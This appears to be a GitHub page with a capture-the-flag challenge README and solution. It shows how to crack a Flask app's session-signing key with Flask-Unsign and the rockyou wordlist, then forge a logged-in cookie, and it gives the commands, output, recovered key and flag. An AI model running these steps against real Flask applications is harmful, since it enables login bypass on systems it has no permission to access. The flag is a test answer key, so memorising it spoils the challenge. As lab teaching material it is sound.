Skip to content

Latest commit

 

History

History

Signed Flask

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
app
app
 
 
files
files
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
challenge.yml
challenge.yml
 
 

README.md

Signed Flask

Author: Marin Radu


Description

Bypass the login by tampering with Flask's session cookie. 
Discover the secret key to access the flag.

Requirements

  • Flask cookie manipulation

Solve

Manipulate and crack the Flask session cookie using the Flask-Unsign tool. A detailed guide and necessary steps can be found on Flask-Unsign GitHub. You'll need a substantial wordlist, like rockyou, to brute-force the secret key.

  1. Install Flask-Unsign with wordlist support:
pip3 install flask-unsign[wordlist]
  1. Decode the session cookie from the server:
flask-unsign --decode --server  '$URL'

Output:

[*] Server returned HTTP 403 (FORBIDDEN)
[+] Successfully obtained session cookie: ...
{'logged_in': False}
  1. Brute-force the secret key using the decoded cookie and a wordlist:
flask-unsign --unsign --cookie "..." --no-literal-eval -w /usr/share/wordlists/rockyou.txt

Output

[*] Session decodes to: {'logged_in': False}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after ... attempts: '98765432123456789'

Flag: CSCTF{98765432123456789}